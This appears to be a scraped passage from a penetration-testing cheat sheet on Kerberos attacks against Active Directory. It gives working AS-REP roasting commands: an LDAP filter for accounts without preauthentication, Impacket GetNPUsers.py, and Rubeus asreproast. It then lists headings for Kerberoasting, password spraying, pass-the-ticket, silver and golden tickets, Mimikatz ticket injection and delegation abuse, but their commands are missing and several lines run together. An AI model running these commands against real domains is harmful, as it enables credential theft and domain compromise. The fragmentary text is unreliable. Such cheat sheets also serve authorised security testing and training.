Kerberos
Check for valid users
Using LDAP
LDAP: (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))Using Impacket GetNPUsers.py
python GetNPUsers.py $domain/ -usersfile $users -format $format -outputfile $out_filepython GetNPUsers.py $domain/$user:$password -request -format $format -outputfile $out_fileUsing Rubeus with ASREPRoast module
.\Rubeus.exe asreproast /format:$format /outfile:$out_fileBrute Force
With kerbrute.py
With Rubeus using the 'brute' module
Password Spray
Kerberoast
Enumeration using LDAP
Using Impacket GetUserSPNs.py
Using Rubeus with kerberoast module
Overpass The Hash/Pass The Key (PTK)
Using Impacket getTGT.py
Pass The Ticket
From Linux
Using Impacket
Convert tickets between Linux/Windows format with ticket_converter.py
From Windows
Using Mimikatz to export the tickets
Inject ticket with Mimikatz:
Using Rubeus with dump module
Inject ticket with Rubeus ptt module
Execute a command with PsExec after injecting the ticket
Silver ticket
Using Impacket ticketer.py
Using Mimikatz
Golden ticket
Using Impacket ticketer.py
Using Mimikatz
Misc
Get NTLM hash from password
Delegation
Unconstrained delegation
Last updated